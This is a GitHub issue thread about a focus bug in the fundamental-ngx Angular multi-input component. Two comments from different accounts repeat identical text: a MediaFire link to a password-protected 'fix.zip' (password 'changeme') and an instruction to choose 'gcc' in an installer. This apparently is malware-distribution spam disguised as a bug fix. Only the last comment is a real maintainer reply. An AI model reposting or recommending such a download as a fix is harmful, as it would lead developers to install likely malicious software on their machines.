### ISSUE TITLE
[P3][Sourcing][Multi-input]For Multi-select fields - type in on the field select the match then click on the next header field. The cursor returns to the previous field.

### ISSUE THREAD

**Issue by Pooja-JN** [SAP/fundamental-ngx#12321]
#### Is this a bug, enhancement, or feature request?
Bug

#### Describe your proposal.
In the Field, type and search the value and select the checkbox.  Then on click on the next field. The cursor returns from the next field to the previous field 

#### Can you handle that on the application side
No

#### Which versions of Angular and Fundamental Library for Angular are affected? Please, specify the exact version. (If this is a feature request, use current version.)
Angular:15.2.10
core/Platform:0.43.40

#### If this is a bug, please provide steps for reproducing it; the exact components you are using;

1. select a multi-input
2. In the Field, type and search the value and select the checkbox.
3. Then click on the next field. 
4. The cursor returns from the next field to the previous field 

#### Please provide relevant source code (if applicable).

https://ng-15-downport--fundamental-ngx.netlify.app/#/core/multi-input

https://github.com/user-attachments/assets/272332d7-3fa8-451e-919c-4dba00434500

#### Please provide stackblitz example(s).

https://stackblitz.com/edit/angular-9qxxca-awzhkq?file=src%2Fapp%2Fplatform-table-preserved-state-example.component.html,src%2Fapp%2Fplatform-table-preserved-state-example.component.ts,package.json
 

#### Is there anything else we should know?

**_IMPORTANT: Please refrain from providing links or screenshots of SAP's internal information, as this project is open-source, and its contents are accessible to anyone._**

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by droshev** [comment]
@Pooja-JN Can you close the popover and then click on the next field?
